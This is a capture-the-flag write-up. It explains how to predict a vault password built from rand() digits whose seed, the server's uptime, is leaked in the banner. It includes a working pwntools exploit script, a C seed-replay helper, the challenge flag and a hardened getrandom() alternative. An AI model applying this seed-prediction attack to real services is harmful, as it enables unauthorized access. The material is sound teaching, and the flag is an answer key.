Difficulty
50/100
Category
exploitation
How To Solve
This time the sequence is again generated with rand(), but the generator is seeded with the current uptime in seconds. The problem is that the program already prints how long it has been running in its connection welcome message:
Welcome to Robbe's secure vault v2.
I have been protecting Robbe's secrets for 2 day(s), 21 hours, 59 minutes and 3 seconds
Please enter the password to see all the secrets:
So to solve this, you can extract the uptime from this header string, convert it to seconds, and use it to seed a random generator.
Most glibc implementations will use the same rand() algorithm, but if yours is different you can just run all this code in an Ubuntu Docker image. The Ubuntu version was given.
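from pwn import *
import time

# Connect and read the welcome banner, which contains the uptime
conn = remote("localhost", 3004)
time.sleep(0.1)
recv = conn.recv(1024).decode()

# Cut out "2 day(s), 21 hours, 59 minutes and 3 seconds" and split it into its four parts
start = recv.index('for ') + 4
duration = recv[start:recv.index('\n', start)]
duration = duration.replace('and ', ', ').split(', ')
print(duration)
days = int(duration[0].split()[0])
hours = int(duration[1].split()[0])
minutes = int(duration[2].split()[0])
seconds = int(duration[3].split()[0])

# The seed is the uptime in seconds
seed = days * (24*60*60) + hours * (60*60) + minutes * 60 + seconds

# Let the C helper produce the rand() sequence for that seed;
# recvall() waits for the helper to exit, so the output is never cut short
p = process(['./generator', str(seed)])
numbers = p.recvall()
conn.send(numbers)
time.sleep(0.1)
print(conn.recv(1024).decode())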
Then I used a C program to generate the output
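#include <stdio.h>
#include <stdlib.h>

/* Prints the 20 digits that rand() yields for the seed given in argv[1]. */
int main(int argc, char** argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <seed>\n", argv[0]);
        return 1;
    }
    int seed = atoi(argv[1]);
    srand(seed);
    for (int i = 0; i < 20; i++) {
        int num = rand() % 10;
        printf("%i\n", num);
    }
    return 0;
}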
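The root cause, seen from the defender's side: rand() is fully determined by its seed, and here the seed is disclosed in the banner. The following is an added example, not code from the challenge or from the original write-up. It puts the weak construction, which mirrors the generator above, next to a fix that draws the digits from the kernel CSPRNG with getrandom(). The function names, PASS_LEN and the sample seed are assumptions made for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/random.h>   /* getrandom(), glibc >= 2.25 */

#define PASS_LEN 20       /* assumed length, same as the generator's 20 digits */

/* Weak: rand() seeded from a value the server discloses.
 * Anyone who knows `seed` obtains exactly the same digits. */
void weak_password(unsigned int seed, char out[PASS_LEN + 1]) {
    srand(seed);
    for (int i = 0; i < PASS_LEN; i++)
        out[i] = (char)('0' + rand() % 10);
    out[PASS_LEN] = '\0';
}

/* Hardened: digits come from the kernel CSPRNG, no seed to guess.
 * Bytes >= 250 are rejected so that `% 10` stays uniform.
 * Returns 0 on success, -1 if getrandom() fails. */
int strong_password(char out[PASS_LEN + 1]) {
    int n = 0;
    while (n < PASS_LEN) {
        unsigned char buf[32];
        ssize_t got = getrandom(buf, sizeof buf, 0);
        if (got < 0)
            return -1;
        for (ssize_t i = 0; i < got && n < PASS_LEN; i++)
            if (buf[i] < 250)
                out[n++] = (char)('0' + buf[i] % 10);
    }
    out[PASS_LEN] = '\0';
    return 0;
}

int main(void) {
    /* Constructed seed: the uptime from the sample banner, in seconds. */
    unsigned int seed = 2 * 86400 + 21 * 3600 + 59 * 60 + 3;
    char a[PASS_LEN + 1], b[PASS_LEN + 1], c[PASS_LEN + 1];
    weak_password(seed, a);
    weak_password(seed, b);
    printf("weak #1: %s\nweak #2: %s (identical: %d)\n", a, b, !strcmp(a, b));
    if (strong_password(c) != 0)
        return 1;
    printf("strong : %s\n", c);
    return 0;
}
```

Not printing the uptime would only shrink the search space; the seed would still be a small, guessable integer, so the fix has to be in the random source.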
Hints
n/a
Flag
IGCTF{yoU_br0k3_Th3_UnbR34kAblE}